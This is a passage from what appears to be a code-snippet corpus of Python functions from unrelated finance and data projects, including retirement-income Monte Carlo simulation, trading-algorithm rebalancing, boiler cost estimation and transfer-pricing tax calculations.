of portfolio value less than 0 at the end of the expected life'],\n index=['base', 'fia_portfolio', 'Notes'],\n columns=['Ruin Probability'])\n\n # -----------Year-wise probability of ending value greater than 0 -----------------\n base_psuccess = sim_base_total.apply(lambda x: x > 0).sum(axis=1) / trials\n port_psuccess = sim_port_total.apply(lambda x: x > 0).sum(axis=1) / trials\n\n # -----------------------WRITING FILES TO EXCEL ---------------------------\n\n writer = pd.ExcelWriter(src + method + '_simulated_income_summary_custom.xlsx', engine='xlsxwriter')\n read_income_inputs.to_excel(writer, sheet_name='inputs_for_income')\n\n read_returns_est.to_excel(writer, sheet_name='asset_returns_estimates')\n # read_portfolio_inputs.to_excel(writer, sheet_name='portfolio_inputs')\n\n age_index = list(range(clients_age + 1, clients_age + len(base_qcut) + 1))\n # base_qcut.loc[:, 'clients_age'] = age_index\n # base_qcut.loc[:, 'comment'] = ''\n # base_qcut.loc[:, 'comment'] = np.where(base_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n base_inv = float(read_income_inputs.loc['risky_assets', 'Base'])\n base_qcut.loc[:, 'age'] = age_index\n base_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n\n # --------To start with year 0---------------------------------\n insert_col = [base_inv, base_inv, base_inv, base_inv, base_inv, base_inv,\n base_inv, clients_age, np.nan]\n base_qcut.loc[len(base_qcut) + 1, :] = 0.0\n base_qcut = base_qcut.shift(1)\n base_qcut.iloc[0] = insert_col\n base_qcut.reset_index(drop=True, inplace=True)\n base_qcut.loc[:, 'Annual Return'] = base_qcut.loc[:, '50th'].pct_change().fillna(0)\n base_qcut.to_excel(writer, sheet_name='base_ending_value_quantiles')\n # base_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_ending_value_quantiles')\n\n # base_income_qcut = base_income_qcut[1:] base_income_qcut.loc[:, 'clients_age'] = age_index\n # base_income_qcut.loc[:, 'comment'] = '' base_income_qcut.loc[:, 'comment'] = np.where(\n # base_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n base_income_qcut = base_income_qcut.loc[1:, :]\n base_income_qcut.loc[:, 'age'] = age_index\n base_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n\n base_income_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_quantiles')\n\n # age_index = list(range(clients_age+1, clients_age + len(port_qcut)+1))\n # port_qcut.loc[:, 'clients_age'] = age_index\n # port_qcut.loc[:, 'comment'] = ''\n # port_qcut.loc[:, 'comment'] = np.where(port_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_qcut.loc[:, 'age'] = age_index\n port_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_qcut.loc[len(port_qcut) + 1, :] = 0.0\n port_qcut = port_qcut.shift(1)\n port_qcut.iloc[0] = insert_col\n port_qcut.reset_index(drop=True, inplace=True)\n port_qcut.loc[:, 'Annual Return'] = port_qcut.loc[:, '50th'].pct_change().fillna(0)\n port_qcut.to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n # port_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n\n # port_income_qcut = port_income_qcut[1:] port_income_qcut.loc[:, 'clients_age'] = age_index\n # port_income_qcut.loc[:, 'comment'] = '' port_income_qcut.loc[:, 'comment'] = np.where(\n # port_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_income_qcut = port_income_qcut.loc[1:, :]\n port_income_qcut.loc[:, 'age'] = age_index\n 
port_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_income_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='fia_port_income_quantiles')\n\n prob_success_df = pd.concat([base_psuccess, port_psuccess], axis=1)\n prob_success_df.rename(columns={prob_success_df.columns[0]: 'prob(ending_value>0)_base',\n prob_success_df.columns[1]: 'prob(ending_value>0)_port'}, inplace=True)\n\n # prob_success_df.loc[:, 'clients_age'] = age_index\n # prob_success_df.loc[:, 'comment'] = ''\n # prob_success_df.loc[:, 'comment'] = np.where(prob_success_df.clients_age == life_expectancy, 'expected_life', \"\")\n\n prob_success_df.loc[:, 'age'] = age_index\n prob_success_df.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_base'] = base_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_port'] = port_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_base'] = base_success_next_year / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_port'] = port_success_next_year / trials\n prob_success_df.loc[:, 'base_max_portfolio_at_acturial_age'] = base_max_portfolio\n prob_success_df.loc[:, 'port_max_portfolio_at_acturial_age'] = port_max_portfolio\n\n # --------------------Percentile Portfolio's based on Acturial Life------------------------\n base_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_base']\n port_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_port']\n\n # acturial_age_base_tv = sim_base_total.loc[:life_expectancy - clients_age, ]\n # percentile_base_tv = sim_base_total.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_base = base_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = base_for_next_year_need.copy().fillna(0)\n percentile_base = base_for_next_year_need.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # acturial_age_port_tv = sim_port_total.loc[:life_expectancy - clients_age, ]\n # percentile_port_tv = sim_port_total.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. 
Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_port = port_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = port_for_next_year_need.copy().fillna(0)\n percentile_port = port_for_next_year_need.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n prob_success_df.loc[:, 'acturial_success_percentile_base_portfolio'] = percentile_base\n prob_success_df.loc[:, 'acturial_success_percentile_port_portfolio'] = percentile_port\n\n # prob_success_df.loc[:, 'terminalVal_success_percentile_base_portfolio'] = percentile_base_tv\n # prob_success_df.loc[:, 'terminalVal_success_percentile_port_portfolio'] = percentile_port_tv\n\n prob_success_df.to_excel(writer, sheet_name='success_probability')\n\n # --------------BASE - Accumulation and Income Breakdown based on the success percentile portfolio---------------\n base_df.to_csv(src + 'base_port_detail.csv')\n sim_base_total.to_csv(src + 'base_ending_values.csv')\n income_breakdown_base = pd.DataFrame(sim_base_total.quantile(base_success, axis=1))\n income_breakdown_base.loc[:, 'income_from_risky_assets'] = sim_base_income.quantile(base_success, axis=1) \\\n - social - cpn_income_port\n income_breakdown_base.loc[:, 'guaranteed_income'] = 0.0\n income_breakdown_base.loc[:, 'social_security_income'] = social\n income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n\n income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_base.loc[:, 'income_from_risky_assets'][\n income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n axis=1)\n\n # ----------FIA PORTFOLIO - Accumulation and Income Breakdown based on the success percentile portfolio-----------\n fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n\n income_breakdown_port = pd.DataFrame(sim_port_total.quantile(port_success, axis=1))\n income_breakdown_port.loc[:, 'income_from_risky_assets'] = sim_port_income.quantile(port_success, axis=1) \\\n - income_from_fia - social - cpn_income_port\n income_breakdown_port.loc[:, 'guaranteed_income'] = income_from_fia\n income_breakdown_port.loc[:, 'social_security_income'] = social\n income_breakdown_port.loc[:, 'coupon_income'] = cpn_income_port\n\n income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_port.loc[:, 'income_from_risky_assets'][\n income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n axis=1)\n\n # -------------------Write simulation Statistics-------------------------------------\n simulation_stats.to_excel(writer, sheet_name='simulation_statistics')\n\n # port_psuccess.to_excel(writer, sheet_name='fia_port_success_probability')\n\n income_breakdown_base = income_breakdown_base.loc[1:, :]\n income_breakdown_base.loc[:, 'age'] = age_index\n income_breakdown_base.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_base.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_breakdown_median')\n\n income_breakdown_port = income_breakdown_port.loc[1:, :]\n 
income_breakdown_port.loc[:, 'age'] = age_index\n income_breakdown_port.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_port.loc[income_starts:, :].to_excel(writer, sheet_name='fia_income_breakdown_median')\n\n legacy_risk.to_excel(writer, sheet_name='ruin_probability')\n\n median_returns_normal.loc[:, 'fia_median_returns'] = median_normal_fia\n median_returns_normal.to_excel(writer, sheet_name='gr_port_median_normal')\n\n writer.save()\n\n # -----------------Plotting charts--------------------------------------------\n base_qcut.loc[income_starts:].plot(grid=True, title='Quantile Terminal Value - Base Portfolio')\n plt.savefig(src + \"quantile_terminal_base.png\")\n plt.close('all')\n\n base_income_qcut.plot(grid=True, title='Quantile Income - Base Portfolio')\n plt.savefig(src + \"quantile_income_base.png\")\n plt.close('all')\n\n base_psuccess.plot(grid=True, title='Probability of Success (Portfolio Ending Value > 0) - Base Portfolio')\n plt.savefig(src + \"success_probabilty_base.png\")\n plt.close('all')\n\n (1 - base_psuccess).plot(grid=True, title='Probability of Ruin (Portfolio Ending Value < 0) - Base Portfolio')\n plt.savefig(src + \"ruin_probability_base.png\")\n plt.close('all')\n\n port_qcut.loc[income_starts:].plot(grid=True, title='Quantile Terminal Value - FIA Portfolio')\n plt.savefig(src + \"quantile_terminal_fia.png\")\n plt.close('all')\n\n port_income_qcut.plot(grid=True, title='Quantile Income - FIA Portfolio')\n plt.savefig(src + \"quantile_income_fia.png\")\n plt.close('all')\n\n port_psuccess.plot(grid=True, title='Probability of Success (Portfolio Ending Value > 0) - FIA Portfolio')\n plt.savefig(src + \"success_probabilty_fia.png\")\n plt.close('all')\n\n (1 - port_psuccess).plot(grid=True, title='Probability of Ruin (Portfolio Ending Value < 0) - FIA Portfolio')\n plt.savefig(src + \"ruin_probability_fia.png\")\n plt.close('all')\n\n print(\"simulation completed....\")", "def _create_performance_contribution_tables(self, performance_df: QFDataFrame) -> List[DFTable]:\n # Create a QFSeries which contains the initial amount of cash in the portfolio for each year / month\n numeric_columns = [col for col in performance_df.columns if is_numeric_dtype(performance_df[col])]\n portfolio_values = performance_df[numeric_columns].sum().shift(fill_value=self._initial_cash).cumsum()\n performance_df[numeric_columns] = performance_df[numeric_columns] / portfolio_values[numeric_columns]\n\n # Add category column and aggregate data accordingly\n ticker_name_to_category = {t.name: category for t, category in self._ticker_to_category.items()}\n performance_df[\"Category\"] = performance_df[\"Asset\"].apply(lambda t: ticker_name_to_category[t])\n all_categories = list(set(ticker_name_to_category.values()))\n performance_df = performance_df.sort_values(by=[\"Category\", \"Asset\"])\n performance_df = performance_df.groupby(\"Category\").apply(\n lambda d: pd.concat([PricesDataFrame({**{\"Asset\": [d.name], \"Category\": [d.name]},\n **{c: [d[c].sum()] for c in numeric_columns}}), d],\n ignore_index=True)).drop(columns=[\"Category\"])\n\n # Add the Total Performance row (divide by 2 as the df contains already aggregated data for each group)\n total_sum_row = performance_df[numeric_columns].sum() / 2\n total_sum_row[\"Asset\"] = \"Total Performance\"\n performance_df = performance_df.append(total_sum_row, ignore_index=True)\n\n # Format the rows using the percentage formatter\n performance_df[numeric_columns] = 
performance_df[numeric_columns].applymap(lambda x: '{:.2%}'.format(x))\n\n # Divide the performance dataframe into a number of dataframes, so that each of them contains up to\n # self._max_columns_per_page columns\n split_dfs = np.array_split(performance_df.set_index(\"Asset\"),\n np.ceil((performance_df.num_of_columns - 1) / self._max_columns_per_page), axis=1)\n df_tables = [DFTable(df.reset_index(), css_classes=['table', 'shrink-font', 'right-align', 'wide-first-column'])\n for df in split_dfs]\n\n # Get the indices of rows, which contain category info\n category_indices = performance_df[performance_df[\"Asset\"].isin(all_categories)].index\n\n for df_table in df_tables:\n # Add table formatting, highlight rows showing the total contribution of the given category\n df_table.add_rows_styles(category_indices, {\"font-weight\": \"bold\", \"font-size\": \"0.95em\",\n \"background-color\": \"#cbd0d2\"})\n df_table.add_rows_styles([performance_df.index[-1]], {\"font-weight\": \"bold\", \"font-size\": \"0.95em\",\n \"background-color\": \"#b9bcbd\"})\n return df_tables", "def denormalize(stock_name, normalized_value,split=0.7,predict=True):\n df = xl.parse(stock_name)\n #df.drop(['VOLUME'], 1, inplace=True)\n df.set_index('Date', inplace=True)\n \n # Renaming all the columns so that we can use the old version code\n df.rename(columns={'OPEN': 'Open', 'HIGH': 'High', 'LOW': 'Low', 'NUMBER_TICKS': 'Volume', 'LAST_PRICE': 'Adj Close'}, inplace=True)\n\n\n df.dropna(inplace=True)\n df = df['Adj Close'].values.reshape(-1,1)\n normalized_value = normalized_value.reshape(-1,1)\n \n row = round(split * df.shape[0]) \n if predict:\n df_p=df[0:row].copy()\n else:\n df_p=df[row:len(df)].copy()\n \n #return df.shape, p.shape\n max_df=np.max(df_p)\n min_df=np.min(df_p)\n new=normalized_value*(max_df-min_df)+min_df\n \n return new", "def consumptionFromHashrate(data_df, eff: float=0.02, same_hr: bool=False, verbose: bool=VERBOSE):\n count = 0\n year_ends = []\n years = [str(year) for year in range(2016,2050,1)]\n for y in years:\n if int(y) % 4 == 0:\n count += 366\n else:\n count += 365\n\n year_ends.append(count)\n\n hr_race_df = pd.DataFrame(columns=data_df.columns)\n hr_race_df[\"date\"] = years\n\n # computing hashrate prediction via regression for each crypto (i.e. 
each column)\n print(f\"\\n[INFO]: Computing crypto energy consumption from hashrate (using efficiency {eff:0.2f}) ...\\n\")\n for crypto in data_df.columns[1:]:\n print(f\"Analyzing hashrate of {crypto} ...\")\n \n # removing NaN values for cryptos that have only recent data\n y = np.array(data_df[crypto], dtype=np.float64)\n y[np.isnan(y)] = 0\n \n if (crypto == \"BTC\" and same_hr):\n hr_list = []\n\n cons_list = []\n start = 0\n for end in range(len(year_ends)):\n if not same_hr:\n hr_year = np.sum(y[start:year_ends[end]])\n else:\n # use BTC hahrate for all crypto with relative efficiency\n eff = efficiencies[crypto]\n if crypto == \"BTC\":\n # compute year hr for BTC\n hr_year = np.sum(y[start:year_ends[end]])\n hr_list.append(hr_year)\n else:\n # reuse BTC year hr for other crypto\n hr_year = hr_list[end]\n\n if verbose:\n print(f\"hr: {hr_year}\")\n print(f\"eff: {eff}, crypto: {crypto}\")\n\n # compute estimated consumption\n cons_year = np.multiply(hr_year, eff*1000)\n cons_year = cons_year/(24*1000000)\n cons_year = np.divide(cons_year, 1000)\n # -----------------------------\n\n cons_list.append(cons_year)\n start = year_ends[end]\n\n hr_series = pd.Series(cons_list)\n hr_race_df[crypto] = hr_series\n #print(\"hr_list\", len(cons_list))\n \n print()\n if verbose:\n print(hr_race_df.T)\n\n hr_race_df = hr_race_df.T\n hr_race_df.to_csv(f\"data/dataset/temp_{eff}.csv\")", "def rebalance(context, data):\n logger.debug('rebalancing on: %s', algo.get_datetime())\n\n context.trend_filter = False\n\n # new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio (before filtering) - equity: %s', equity)\n\n # print(new_portfolio)\n\n # new_portfolio = new_portfolio[new_portfolio['overall_rank'].notna() & new_portfolio['momentum'] > 40][:20]\n \n # new_portfolio = new_portfolio[(new_portfolio['momentum_decile'] > 8)][:20]\n\n new_portfolio = new_portfolio.nlargest(20, ['overall_rank', 'momentum']) #<- $600K PL in 10 years\n\n # new_portfolio = new_portfolio.nlargest(20, ['momentum', 'overall_rank']) #<- 1M PL in 10 years\n\n if logger.level is logging.DEBUG:\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio - (after filtering) equity: %s', equity)\n \n\n # print(len(new_portfolio.index))\n\n # volatility driven weights\n # new_portfolio['inverse_volatility'] = new_portfolio['volatility'].apply(lambda x: 1 / x)\n # inv_vola_sum = new_portfolio['inverse_volatility'].sum()\n # new_portfolio['target_weight'] = new_portfolio['inverse_volatility'].apply(lambda x: x / inv_vola_sum)\n\n # portfolio size driven weights\n # num_equities = len(new_portfolio.index)\n # new_portfolio['target_weight'] = 1 / num_equities\\\n\n # logger.info('len existing portfolio: %s', len(context.portfolio.positions))\n\n if logger.level is logging.DEBUG:\n for equity, values in context.portfolio.positions.items():\n logger.debug('context.portfolio.positions - equity: %s, amount: %s, cost_basis: %s, sold_on: %s, sold_at_price: %s', equity, values.amount, values.cost_basis, values.last_sale_date, values.last_sale_price)\n\n \n order_target(algo.sid('FIBBG000NTFYM5'), 0)\n logger.debug('selling all bonds')\n\n for equity in context.portfolio.positions:\n if equity is algo.sid('FIBBG000NTFYM5'): \n continue\n if equity not in 
set(new_portfolio.index.tolist()):\n # logger.info('selling %s', equity)\n order_target_percent(equity, 0)\n\n stock_weights = 1.0 / max(len(context.portfolio.positions), len(new_portfolio.index))\n\n logger.debug('len existing portfolio (afer ejection): %s', len(context.portfolio.positions))\n logger.debug('len new portfolio: %s', len(new_portfolio.index))\n logger.debug('stock_weights: %s', stock_weights)\n\n # print(context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5')))\n\n # spy = context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5'))\n\n # if (spy is not None) and (spy.amount > 0):\n # order_target_percent(algo.sid('FIBBG000NTFYM5'), 0)\n\n for equity, row in new_portfolio.iterrows():\n if row.trend_filter is True:\n # logger.info('buying %s', equity)\n context.trend_filter = True\n order_target_percent(equity, stock_weights)\n else:\n context.trend_filter = False\n \n logger.debug('cash: %s', context.portfolio.cash)\n logger.debug('portfolio_value: %s', context.portfolio.portfolio_value)\n logger.debug('num_positions: %s', len(context.portfolio.positions))\n logger.debug('positions: %s', context.portfolio.positions)", "def calc_Cinv_boiler(Q_design_W, technology_type, boiler_cost_data):\n Capex_a_Boiler_USD = 0.0\n Opex_a_fix_Boiler_USD = 0.0\n Capex_Boiler_USD = 0.0\n\n if Q_design_W > 0.0:\n boiler_cost_data = boiler_cost_data[boiler_cost_data['code'] == technology_type]\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Q_design_W < boiler_cost_data.iloc[0]['cap_min']:\n Q_design_W = boiler_cost_data.iloc[0]['cap_min']\n max_boiler_size = boiler_cost_data.iloc[0]['cap_max']\n\n if Q_design_W <= max_boiler_size:\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_design_W) & (boiler_cost_data['cap_max'] > Q_design_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = Inv_a + Inv_b * (Q_design_W) ** Inv_c + (Inv_d + Inv_e * Q_design_W) * log(Q_design_W)\n\n Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n else:\n number_of_boilers = int(ceil(Q_design_W / max_boiler_size))\n Q_nom_W = Q_design_W / number_of_boilers\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_nom_W) & (boiler_cost_data['cap_max'] > Q_nom_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = (Inv_a + Inv_b * (Q_nom_W) ** Inv_c + (Inv_d + Inv_e * Q_nom_W) * log(Q_nom_W)) * number_of_boilers\n\n Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n return Capex_a_Boiler_USD, Opex_a_fix_Boiler_USD, Capex_Boiler_USD", "def __init__(self, split: str, train_fraction=0.7):\n\n super().__init__()\n\n self.train_fraction = train_fraction\n\n split_acceptable_values = 
('train', 'val')\n assert split in split_acceptable_values, f\"Acceptable values for split are: {split_acceptable_values}\"\n\n self.split = split\n\n self.coffee_df = pd.read_csv(\n resource_filename(\"data\", \"coffee-prices-historical-chart-data.csv\"), sep=\",\", header=0,\n names=['date', 'value'],\n skiprows=2687)\n self.coffee_df['value_normalized'] =\\\n Normalizer(norm='max').fit_transform(self.coffee_df['value'].values.reshape((1, -1))).ravel()\n\n\n self.sugar_df = pd.read_csv(\n resource_filename(\"data\", \"sugar-prices-historical-chart-data.csv\"), sep=\",\", header=0,\n names=['date', 'value'],\n skiprows=13)\n self.sugar_df['value_normalized'] =\\\n Normalizer(norm='max').fit_transform(self.sugar_df['value'].values.reshape((1, -1))).ravel()\n\n if len(self.coffee_df) != len(self.sugar_df) or len(self.coffee_df) == 0:\n raise ValueError(\"Both dataframes should have datapoints and the same number of datapoints as each other\")\n n_records_total = len(self.coffee_df)\n self.n_records_train = int(self.train_fraction * n_records_total)\n self.n_records_val = n_records_total - self.n_records_train\n\n self.sugar_df_train, self.sugar_df_val = self.sugar_df.iloc[:self.n_records_train, :],\\\n self.sugar_df.iloc[self.n_records_train:, :]\n\n self.coffee_df_train, self.coffee_df_val = self.coffee_df.iloc[:self.n_records_train, :],\\\n self.coffee_df.iloc[self.n_records_train:, :]\n\n self.pane_size = 4 # how many sequential tokens there are per side of neural net (#output units = #input units)\n \"\"\"\n - - - - # output (pane), sequence with x-axis being time--->\n - - - - # input (pane), sequence with x-axis being time--->\n 0 1 2 3 4 # indices for input and output above\n \"\"\"\n self.frame_size = self.pane_size + 1", "def get_prices(country, year, square=2, name='p_', store=yearly):\n\n year1 = 'y' + str(year) + '_'\n year0 = 'y' + str(year - 1) + '_'\n\n df1 = yearly[year1 + 'price_' + country]\n df0 = yearly[year0 + 'price_' + country]\n\n df1.name = 'p' + str(year)\n df0.name = 'p' + str(year - 1)\n\n gr1 = df1.groupby(axis=0, level='PRODUCT_NC')\n gr0 = df0.groupby(axis=0, level='PRODUCT_NC')\n\n l1 = []\n drops1 = []\n for product in gr1.groups.keys():\n try:\n l1.append((product, ref_dict[product]))\n except KeyError:\n drops1.append(product)\n\n l0 = []\n drops0 = []\n for product in gr0.groups.keys():\n try:\n l0.append((product, ref_dict[product]))\n except KeyError:\n drops0.append(product)\n\n return pd.DataFrame((np.log(df1) - np.log(df0) - (\n np.log(df1.ix[l1].reset_index(level='PARTNER')['p' + str(year)].reindex(df1.index, level='PRODUCT_NC')) - (\n np.log(df0.ix[l0].reset_index(level='PARTNER')['p' + str(year - 1)].reindex(df0.index, level='PRODUCT_NC'))))), columns=[name + str(year)]) ** square", "def before_trading_start(context, data):\n context.output = pipeline_output('my_pipeline')\n context.current_stock_list = context.output.index.tolist()\n #print(context.output['weekly_classifier'])\n context.daily_stat_history.append(context.output)\n if len(context.daily_stat_history) > 2: # only keep last two units\n context.daily_stat_history.pop(0)\n\n # print context.output['daily_classifier']\n sig_counts = context.output['daily_classifier'].value_counts()\n if 2.0 not in sig_counts.index:\n sig_counts[2.0] = 0.0\n if 4.0 not in sig_counts.index:\n sig_counts[4.0] = 0.0\n if 8.0 not in sig_counts.index:\n sig_counts[8.0] = 0.0\n if 10.0 not in sig_counts.index:\n sig_counts[10.0] = 0.0\n if 12.0 not in sig_counts.index:\n sig_counts[12.0] = 0.0\n if 16.0 not in 
sig_counts.index:\n sig_counts[16.0] = 0.0\n if 18.0 not in sig_counts.index:\n sig_counts[18.0] = 0.0\n if 20.0 not in sig_counts.index:\n sig_counts[20.0] = 0.0", "def front_column_model_p_gain():", "def sub_tax_cost_transfer_pricing(manager, df_fields, seq_recs, seq_reservas):\n # df_hotel = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel\"])\n # df_circuit = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel_circuit\"])\n # df_other = manager.get_dataframe(tables[\"dwc_bok_t_canco_other\"])\n # df_transfer = manager.get_dataframe(tables[\"dwc_bok_t_canco_transfer\"])\n # df_endow = manager.get_dataframe(tables[\"dwc_bok_t_canco_endowments\"])\n # df_extra = manager.get_dataframe(tables[\"dwc_bok_t_canco_extra\"])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\", \"invoicing_company\", \"creation_date\",\n \"booking_currency\")\n\n df_hotel = sub_tax_cost_transfer_pricing_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_cost_transfer_pricing_aux(manager, df_circuitt, seq_recs, seq_reservas, df_aux)\n df_other = sub_tax_cost_transfer_pricing_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_cost_transfer_pricing_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_cost_transfer_pricing_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_cost_transfer_pricing_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canco = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canco = df_impuesto_canco.groupBy(\"operative_incoming\", \"booking_id\") \\\n .agg({'impuesto_canco': 'sum'}).withColumnRenamed(\"SUM(impuesto_canco)\", \"impuesto_canco\")\n\n df_impuesto_canco = df_impuesto_canco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add impuesto_canco\n df_fields = df_fields.join(df_impuesto_canco, [df_fields.operative_incoming == df_impuesto_canco.seq_rec,\n df_fields.booking_id == df_impuesto_canco.seq_res],\n 'left_outer').drop(\"seq_rec\", \"seq_res\")\n\n df_addcanco = sub_transfer_pricing_aux_add_canco(manager, df_fields, seq_recs, seq_reservas)\n\n df_addcanco = df_addcanco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add add_impuesto_canco\n df_fields = df_fields.join(df_addcanco, [df_fields.operative_incoming == df_addcanco.seq_rec,\n df_fields.booking_id == df_addcanco.seq_res],\n \"left_outer\").drop(df_addcanco.seq_rec).drop(df_addcanco.seq_res)\n\n df_fields = df_fields.na.fill({'impuesto_canco': 0, 'add_impuesto_canco': 0})\n\n df_fields = df_fields.withColumn(\"Tax_Cost_Transfer_pricing\",\n df_fields.impuesto_canco + df_fields.add_impuesto_canco) \\\n .drop(\"impuesto_canco\", \"add_impuesto_canco\")\n\n df_fields = df_fields.withColumn(\"Tax_Cost_Transfer_pricing\", udf_round_ccy(df_fields.Tax_Cost_Transfer_pricing,\n df_fields.booking_currency))\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canco, df_addcanco, df_aux\n\n return df_fields", "def compute_increase_rate(input_data):\n rates = {}\n for comp in input_data:\n stock_prices = input_data[comp][1]\n rates[comp] = []\n for i in range(len(stock_prices)-1):\n # Add a new increase rate to the dictionary\n rates[comp].append((stock_prices[i] - stock_prices[i+1])/stock_prices[i+1])\n return rates", "def calc_cop():\n df = 
pp.load_csv_file('COP_in.csv', 'metrics_data') \n df = pp.clean_dataframe(df, 5)\n\n df_cop = df['LP01LM01_QQ'] / df['SJ01_SM01']\n df_cop = df_cop.replace(to_replace=np.nan, value = 0, inplace=False)\n \n return df_cop", "def sub_tax_cost_transfer_pricing_eur(manager, df_fields, seq_recs, seq_reservas):\n # df_hotel = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel\"])\n # df_circuit = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel_circuit\"])\n # df_other = manager.get_dataframe(tables[\"dwc_bok_t_canco_other\"])\n # df_transfer = manager.get_dataframe(tables[\"dwc_bok_t_canco_transfer\"])\n # df_endow = manager.get_dataframe(tables[\"dwc_bok_t_canco_endowments\"])\n # df_extra = manager.get_dataframe(tables[\"dwc_bok_t_canco_extra\"])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\", \"invoicing_company\", \"creation_date\",\n \"booking_currency\")\n\n df_hotel = sub_tax_transfer_pricing_eur_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_transfer_pricing_eur_aux(manager, df_circuitt, seq_recs, 